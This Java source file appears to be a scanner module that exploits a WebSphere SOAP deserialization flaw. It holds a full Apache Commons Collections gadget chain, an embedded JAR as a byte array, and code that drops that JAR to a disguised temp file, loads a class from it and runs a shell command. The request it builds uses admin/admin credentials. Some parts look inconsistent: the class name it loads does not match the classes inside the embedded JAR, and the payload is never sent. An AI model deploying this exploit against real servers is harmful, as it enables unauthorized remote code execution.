package action.url;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import tools.HttpConnectionUtils;
import tools.Logger;
import tools.StringMatcher;

public class WebsphereDeserialize {
	private static int default_port = 8880;
	private static String path = "../.readme.html.tmp";
	private static byte[] jarPayload = { 80,75,3,4,20,0,8,8,8,0,-21,-98,105,74,0,0,0,0,0,0,0,0,0,0,0,0,20,0,4,0,77,69,84,65,45,73,78,70,47,77,65,78,73,70,69,83,84,46,77,70,-2,-54,0,0,-13,77,-52,-53,76,75,45,46,-47,13,75,45,42,-50,-52,-49,-77,82,48,-44,51,-32,-27,-30,-27,2,0,80,75,7,8,-78,127,2,-18,27,0,0,0,25,0,0,0,80,75,3,4,10,0,0,8,0,0,-125,-108,105,74,-19,-68,-103,38,-125,1,0,0,-125,1,0,0,8,0,0,0,46,112,114,111,106,101,99,116,60,63,120,109,108,32,118,101,114,115,105,111,110,61,34,49,46,48,34,32,101,110,99,111,100,105,110,103,61,34,85,84,70,45,56,34,63,62,13,10,60,112,114,111,106,101,99,116,68,101,115,99,114,105,112,116,105,111,110,62,13,10,9,60,110,97,109,101,62,84,101,115,116,80,97,121,108,111,97,100,60,47,110,97,109,101,62,13,10,9,60,99,111,109,109,101,110,116,62,60,47,99,111,109,109,101,110,116,62,13,10,9,60,112,114,111,106,101,99,116,115,62,13,10,9,60,47,112,114,111,106,101,99,116,115,62,13,10,9,60,98,117,105,108,100,83,112,101,99,62,13,10,9,9,60,98,117,105,108,100,67,111,109,109,97,110,100,62,13,10,9,9,9,60,110,97,109,101,62,111,114,103,46,101,99,108,105,112,115,101,46,106,100,116,46,99,111,114,101,46,106,97,118,97,98,117,105,108,100,101,114,60,47,110,97,109,101,62,13,10,9,9,9,60,97,114,103,117,109,101,110,116,115,62,13,10,9,9,9,60,47,97,114,103,117,109,101,110,116,115,62,13,10,9,9,60,47,98,117,105,108,100,67,111,109,109,97,110,100,62,13,10,9,60,47,98,117,105,108,100,83,112,101,99,62,13,10,9,60,110,97,116,117,114,101,115,62,13,10,9,9,60,110,97,116,117,114,101,62,111,114,103,46,101,99,108,105,112,115,101,46,106,100,116,46,99,111,114,101,46,106,97,118,97,110,97,116,117,114,101,60,47,110,97,116,117,114,101,62,13,10,9,60,47,110,97,116,117,114,101,115,62,13,10,60,47,112,114,111,106,101,99,116,68,101,115,99,114,105,112,116,105,111,110,62,13,10,80,75,3,4,10,0,0,8,0,0,90,-100,105,74,-43,-102,87,112,-71,0,0,0,-71,0,0,0,22,0,0,0,119,101,98,108,111,103,105,99,47,73,110,105,116,65,112,112,46,99,108,97,115,115,-54,-2,-70,-66,0,0,0,46,0,11,7,0,2,1,0,16,119,101,98,108,111,103,105,99,47,73,110,105,116,65,112,112,7,0,4,1,0,16,106,97,118,97,47,108,97,110,103,47,79,98,106,101,99,116,7,0,6,1,0,15,106,97,118,97,47,114,109,105,47,82,101,109,111,116,101,1,0,6,114,117,110,67,109,100,1,0,38,40,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,41,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,1,0,10,83,111,117,114,99,101,70,105,108,101,1,0,12,73,110,105,116,65,112,112,46,106,97,118,97,6,1,0,1,0,3,0,1,0,5,0,0,0,1,4,1,0,7,0,8,0,0,0,1,0,9,0,0,0,2,0,10,80,75,3,4,10,0,0,8,0,0,90,-100,105,74,48,-86,48,46,46,7,0,0,46,7,0,0,26,0,0,0,119,101,98,108,111,103,105,99,47,73,110,105,116,65,112,112,73,109,112,108,46,99,108,97,115,115,-54,-2,-70,-66,0,0,0,46,0,106,7,0,2,1,0,20,119,101,98,108,111,103,105,99,47,73,110,105,116,65,112,112,73,109,112,108,7,0,4,1,0,16,106,97,118,97,47,108,97,110,103,47,79,98,106,101,99,116,7,0,6,1,0,16,119,101,98,108,111,103,105,99,47,73,110,105,116,65,112,112,1,0,4,110,97,109,101,1,0,18,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,1,0,6,60,105,110,105,116,62,1,0,21,40,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,41,86,1,0,10,69,120,99,101,112,116,105,111,110,115,7,0,13,1,0,24,106,97,118,97,47,114,109,105,47,82,101,109,111,116,101,69,120,99,101,112,116,105,111,110,1,0,4,67,111,100,101,10,0,3,0,16,12,0,9,0,17,1,0,3,40,41,86,9,0,1,0,19,12,0,7,0,8,1,0,15,76,105,110,101,78,117,109,98,101,114,84,97,98,108,101,1,0,18,76,111,99,97,108,86,97,114,105,97,98,108,101,84,97,98,108,101,1,0,4,116,104,105,115,1,0,22,76,119,101,98,108,111,103,105,99,47,73,110,105,116,65,112,112,73,109,112,108,59,1,0,1,115,1,0,6,114,117,110,67,109,100,1,0,38,40,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,41,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,10,0,28,0,30,7,0,29,1,0,17,106,97,118,97,47,108,97,110,103,47,82,117,110,116,105,109,101,12,0,31,0,32,1,0,10,103,101,116,82,117,110,116,105,109,101,1,0,21,40,41,76,106,97,118,97,47,108,97,110,103,47,82,117,110,116,105,109,101,59,10,0,28,0,34,12,0,35,0,36,1,0,4,101,120,101,99,1,0,39,40,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,41,76,106,97,118,97,47,108,97,110,103,47,80,114,111,99,101,115,115,59,7,0,38,1,0,22,106,97,118,97,47,105,111,47,66,117,102,102,101,114,101,100,82,101,97,100,101,114,7,0,40,1,0,25,106,97,118,97,47,105,111,47,73,110,112,117,116,83,116,114,101,97,109,82,101,97,100,101,114,10,0,42,0,44,7,0,43,1,0,17,106,97,118,97,47,108,97,110,103,47,80,114,111,99,101,115,115,12,0,45,0,46,1,0,14,103,101,116,73,110,112,117,116,83,116,114,101,97,109,1,0,23,40,41,76,106,97,118,97,47,105,111,47,73,110,112,117,116,83,116,114,101,97,109,59,10,0,39,0,48,12,0,9,0,49,1,0,24,40,76,106,97,118,97,47,105,111,47,73,110,112,117,116,83,116,114,101,97,109,59,41,86,10,0,37,0,51,12,0,9,0,52,1,0,19,40,76,106,97,118,97,47,105,111,47,82,101,97,100,101,114,59,41,86,7,0,54,1,0,22,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,66,117,102,102,101,114,10,0,53,0,16,10,0,53,0,57,12,0,58,0,59,1,0,6,97,112,112,101,110,100,1,0,44,40,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,41,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,66,117,102,102,101,114,59,8,0,61,1,0,1,10,10,0,37,0,63,12,0,64,0,65,1,0,8,114,101,97,100,76,105,110,101,1,0,20,40,41,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,10,0,53,0,67,12,0,68,0,65,1,0,8,116,111,83,116,114,105,110,103,10,0,70,0,72,7,0,71,1,0,19,106,97,118,97,47,108,97,110,103,47,69,120,99,101,112,116,105,111,110,12,0,73,0,65,1,0,10,103,101,116,77,101,115,115,97,103,101,1,0,3,99,109,100,1,0,4,112,114,111,99,1,0,19,76,106,97,118,97,47,108,97,110,103,47,80,114,111,99,101,115,115,59,1,0,2,98,114,1,0,24,76,106,97,118,97,47,105,111,47,66,117,102,102,101,114,101,100,82,101,97,100,101,114,59,1,0,2,115,98,1,0,24,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,66,117,102,102,101,114,59,1,0,4,108,105,110,101,1,0,1,101,1,0,21,76,106,97,118,97,47,108,97,110,103,47,69,120,99,101,112,116,105,111,110,59,1,0,4,109,97,105,110,1,0,22,40,91,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,41,86,8,0,87,1,0,11,82,101,109,111,116,101,67,108,97,115,115,10,0,1,0,89,12,0,9,0,10,7,0,91,1,0,27,106,97,118,97,120,47,110,97,109,105,110,103,47,73,110,105,116,105,97,108,67,111,110,116,101,120,116,10,0,90,0,16,11,0,94,0,96,7,0,95,1,0,20,106,97,118,97,120,47,110,97,109,105,110,103,47,67,111,110,116,101,120,116,12,0,97,0,98,1,0,6,114,101,98,105,110,100,1,0,39,40,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,76,106,97,118,97,47,108,97,110,103,47,79,98,106,101,99,116,59,41,86,1,0,4,97,114,103,115,1,0,19,91,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,1,0,3,111,98,106,1,0,3,99,116,120,1,0,22,76,106,97,118,97,120,47,110,97,109,105,110,103,47,67,111,110,116,101,120,116,59,1,0,10,83,111,117,114,99,101,70,105,108,101,1,0,16,73,110,105,116,65,112,112,73,109,112,108,46,106,97,118,97,0,33,0,1,0,3,0,1,0,5,0,1,0,2,0,7,0,8,0,0,0,3,0,1,0,9,0,10,0,2,0,11,0,0,0,4,0,1,0,12,0,14,0,0,0,70,0,2,0,2,0,0,0,10,42,-73,0,15,42,43,-75,0,18,-79,0,0,0,2,0,20,0,0,0,14,0,3,0,0,0,28,0,4,0,30,0,9,0,31,0,21,0,0,0,22,0,2,0,0,0,10,0,22,0,23,0,0,0,0,0,10,0,24,0,8,0,1,0,1,0,25,0,26,0,1,0,14,0,0,0,-30,0,5,0,6,0,0,0,74,-72,0,27,43,-74,0,33,77,-69,0,37,89,-69,0,39,89,44,-74,0,41,-73,0,47,-73,0,50,78,-69,0,53,89,-73,0,55,58,4,-89,0,16,25,4,25,5,-74,0,56,18,60,-74,0,56,87,45,-74,0,62,89,58,5,-57,-1,-20,25,4,-74,0,66,-80,77,44,-74,0,69,-80,0,1,0,0,0,67,0,68,0,70,0,2,0,20,0,0,0,38,0,9,0,0,0,36,0,8,0,37,0,27,0,38,0,36,0,40,0,39,0,42,0,52,0,40,0,62,0,44,0,68,0,45,0,69,0,46,0,21,0,0,0,82,0,8,0,0,0,74,0,22,0,23,0,0,0,0,0,74,0,74,0,8,0,1,0,8,0,60,0,75,0,76,0,2,0,27,0,41,0,77,0,78,0,3,0,36,0,32,0,79,0,80,0,4,0,39,0,13,0,81,0,8,0,5,0,59,0,9,0,81,0,8,0,5,0,69,0,5,0,82,0,83,0,2,0,9,0,84,0,85,0,2,0,11,0,0,0,4,0,1,0,70,0,14,0,0,0,-118,0,3,0,3,0,0,0,34,-69,0,1,89,18,86,-73,0,88,76,-69,0,90,89,-73,0,92,77,44,18,86,43,-71,0,93,3,0,-89,0,6,76,43,-65,-79,0,1,0,0,0,27,0,30,0,70,0,2,0,20,0,0,0,30,0,7,0,0,0,54,0,10,0,55,0,18,0,56,0,27,0,57,0,30,0,58,0,31,0,59,0,33,0,61,0,21,0,0,0,42,0,4,0,0,0,34,0,99,0,100,0,0,0,10,0,17,0,101,0,23,0,1,0,18,0,9,0,102,0,103,0,2,0,31,0,2,0,82,0,83,0,1,0,1,0,104,0,0,0,2,0,105,80,75,3,4,10,0,0,8,0,0,89,-100,105,74,-93,96,37,109,-41,1,0,0,-41,1,0,0,10,0,0,0,46,99,108,97,115,115,112,97,116,104,60,63,120,109,108,32,118,101,114,115,105,111,110,61,34,49,46,48,34,32,101,110,99,111,100,105,110,103,61,34,85,84,70,45,56,34,63,62,13,10,60,99,108,97,115,115,112,97,116,104,62,13,10,9,60,99,108,97,115,115,112,97,116,104,101,110,116,114,121,32,107,105,110,100,61,34,115,114,99,34,32,112,97,116,104,61,34,115,114,99,34,47,62,13,10,9,60,99,108,97,115,115,112,97,116,104,101,110,116,114,121,32,107,105,110,100,61,34,108,105,98,34,32,112,97,116,104,61,34,67,58,47,85,115,101,114,115,47,65,100,109,105,110,105,115,116,114,97,116,111,114,47,68,101,115,107,116,111,112,47,-27,-72,-72,-25,-108,-88,-27,-73,-91,-27,-123,-73,47,74,97,118,97,-27,-113,-115,-27,-70,-113,-27,-120,-105,-27,-116,-106,-25,-69,-120,-26,-98,-127,-26,-75,-117,-24,-81,-107,-27,-73,-91,-27,-123,-73,47,106,97,118,97,-27,-113,-115,-27,-70,-113,-27,-120,-105,-27,-116,-106,47,111,114,103,46,97,112,97,99,104,101,46,99,111,109,109,111,110,115,46,99,111,108,108,101,99,116,105,111,110,115,46,106,97,114,34,47,62,13,10,9,60,99,108,97,115,115,112,97,116,104,101,110,116,114,121,32,107,105,110,100,61,34,99,111,110,34,32,112,97,116,104,61,34,111,114,103,46,101,99,108,105,112,115,101,46,106,100,116,46,108,97,117,110,99,104,105,110,103,46,74,82,69,95,67,79,78,84,65,73,78,69,82,47,111,114,103,46,101,99,108,105,112,115,101,46,106,100,116,46,105,110,116,101,114,110,97,108,46,100,101,98,117,103,46,117,105,46,108,97,117,110,99,104,101,114,46,83,116,97,110,100,97,114,100,86,77,84,121,112,101,47,106,100,107,49,46,54,46,48,95,52,53,34,47,62,13,10,9,60,99,108,97,115,115,112,97,116,104,101,110,116,114,121,32,107,105,110,100,61,34,111,117,116,112,117,116,34,32,112,97,116,104,61,34,98,105,110,34,47,62,13,10,60,47,99,108,97,115,115,112,97,116,104,62,13,10,80,75,1,2,20,0,20,0,8,8,8,0,-21,-98,105,74,-78,127,2,-18,27,0,0,0,25,0,0,0,20,0,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,77,69,84,65,45,73,78,70,47,77,65,78,73,70,69,83,84,46,77,70,-2,-54,0,0,80,75,1,2,10,0,10,0,0,8,0,0,-125,-108,105,74,-19,-68,-103,38,-125,1,0,0,-125,1,0,0,8,0,0,0,0,0,0,0,0,0,0,0,0,0,97,0,0,0,46,112,114,111,106,101,99,116,80,75,1,2,10,0,10,0,0,8,0,0,90,-100,105,74,-43,-102,87,112,-71,0,0,0,-71,0,0,0,22,0,0,0,0,0,0,0,0,0,0,0,0,0,10,2,0,0,119,101,98,108,111,103,105,99,47,73,110,105,116,65,112,112,46,99,108,97,115,115,80,75,1,2,10,0,10,0,0,8,0,0,90,-100,105,74,48,-86,48,46,46,7,0,0,46,7,0,0,26,0,0,0,0,0,0,0,0,0,0,0,0,0,-9,2,0,0,119,101,98,108,111,103,105,99,47,73,110,105,116,65,112,112,73,109,112,108,46,99,108,97,115,115,80,75,1,2,10,0,10,0,0,8,0,0,89,-100,105,74,-93,96,37,109,-41,1,0,0,-41,1,0,0,10,0,0,0,0,0,0,0,0,0,0,0,0,0,93,10,0,0,46,99,108,97,115,115,112,97,116,104,80,75,5,6,0,0,0,0,5,0,5,0,64,1,0,0,92,12,0,0,0,0 };
	private static String requestString = "<?xml version='1.0' encoding='UTF-8'?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\n<SOAP-ENV:Header ns0:JMXConnectorContext=\"\" xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"6.1.0.0\" ns0:JMXMessageVersion=\"1.0.0\" ns0:SecurityEnabled=\"true\" ns0:JMXVersion=\"1.2.0\">\n<username>admin</username>\n<password>admin</password>\n<LoginMethod>BasicAuth</LoginMethod>\n</SOAP-ENV:Header>\n<SOAP-ENV:Body>\n<ns1:invoke xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n<objectname xsi:type=\"ns1:javax.management.ObjectName\">$$$$$$$$$$$$$$</objectname>\n<operationname xsi:type=\"xsd:string\">getProductVersion</operationname>\n<params xsi:type=\"ns1:[Ljava.lang.Object;\">rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAF0AARCQVNF</params>\n<signature xsi:type=\"ns1:[Ljava.lang.String;\">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ABBqYXZhLmxhbmcuU3RyaW5n</signature>\n</ns1:invoke>\n</SOAP-ENV:Body>\n</SOAP-ENV:Envelope>";
	
	public void run(String target) {
		target = standardization(target);
		
		if (check(target)) 
			Logger.getInstance().insertResult(target);
	}
	
	public static String standardization(String target) {
		if (!target.startsWith("http"))
			target = "http://"+target;
		
		return target;
	}
	
	private boolean check(String url) {
		byte[] payload;
		try {
			payload = getPayload("cmd.exe /c echo fireXXX");
		} catch (Exception e) {
			// TODO Auto-generated catch block
			return false;
		}
		
		byte[] commandSend = getBase64Payload(requestString, payload);
		byte[] commandResult = getWebSphereResponse(url, commandSend);
		String result = parseResult(new String(commandResult));
		
		if (StringMatcher.findString(result, "fireXXX", true))
			return true;
		
		return false;
	}
	
	public String parseResult(String result) {
		String returnValue = "";
		try {
			String tmp = result.split("<faultstring>")[1];
		    String reString = tmp.split("</faultstring>")[0];
		    String resultTmp = new String(Base64.getDecoder().decode(reString));
		    int x1 = resultTmp.indexOf("==========") + 10;
		    int x2 = resultTmp.lastIndexOf("==========") - 1;
		    if ((x1 >= 0) && (x2 >= 0))
		    	returnValue = resultTmp.substring(x1, x2).trim();
		    else
		    	returnValue = resultTmp;
		    
		} catch (Exception e) {
			// TODO Auto-generated catch block
		}
		
		return returnValue;
	}
	
	private byte[] getWebSphereResponse(String targetUrl, byte[] payload) {
		HttpConnectionUtils utils = new HttpConnectionUtils();
		
		Map<String, String> headers = new HashMap<String, String>();
		headers.put("SOAPAction", "\"urn:AdminService\"");
		headers.put("Content-Type", "text/xml; charset=utf-8");
		
		if (!utils.openConnection(targetUrl, "GET", headers))
			return null;
		
		byte[] result = utils.getAllByteArrayResponse();
		if (result == null)
			return null;
		
	    return result;
	}
	
	private byte[] getPayload(String command) throws Exception {
        final Transformer[] transforms = new Transformer[] {
       		 new ConstantTransformer(java.io.FileOutputStream.class),
       		 new InvokerTransformer("getConstructor",new Class[] { Class[].class },new Object[] { new Class[] { String.class } }),
       		 new InvokerTransformer("newInstance",new Class[] { Object[].class },new Object[] { new Object[] { path } }),
       		 new InvokerTransformer("write", new Class[] { byte[].class }, new Object[] { jarPayload }),
       		new ConstantTransformer(java.net.URLClassLoader.class),
     		 new InvokerTransformer("getConstructor",new Class[] { Class[].class },new Object[] { new Class[] { java.net.URL[].class } }),
 		     new InvokerTransformer("newInstance",new Class[] { Object[].class },new Object[] { new Object[] { new java.net.URL[] { new java.net.URL("file:"+path) } } }),
 		     new InvokerTransformer("loadClass",new Class[] { String.class }, new Object[] { "jboss.RunCmd" }),
 		     new InvokerTransformer("getConstructor", new Class[] { Class[].class }, new Object[] { new Class[] { String.class } }),
 		     new InvokerTransformer("newInstance",new Class[] { Object[].class }, new Object[] { new Object[] {command} }) };
        Transformer transformerChain = new ChainedTransformer(transforms);
        Map innermap = new HashMap();
        innermap.put("value", "value");
        Map outmap = TransformedMap.decorate(innermap, null, transformerChain);
        Class cls = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor ctor = cls.getDeclaredConstructor(new Class[] {Class.class, Map.class});
        ctor.setAccessible(true);
        Object instance = ctor.newInstance(new Object[] {Retention.class, outmap});
        ByteArrayOutputStream bo=new ByteArrayOutputStream(10);
        ObjectOutputStream out = new ObjectOutputStream(bo);
        out.writeObject(instance);
        out.flush();
        out.close();
        
        return bo.toByteArray();
    }
	
	public byte[] getBase64Payload(String requestString, byte[] payload) {
		String commandBase64 = Base64.getEncoder().encodeToString(payload);
		String commandSend = requestString.replace("$$$$$$$$$$$$$$", commandBase64);
		return commandSend.getBytes();
	}
}
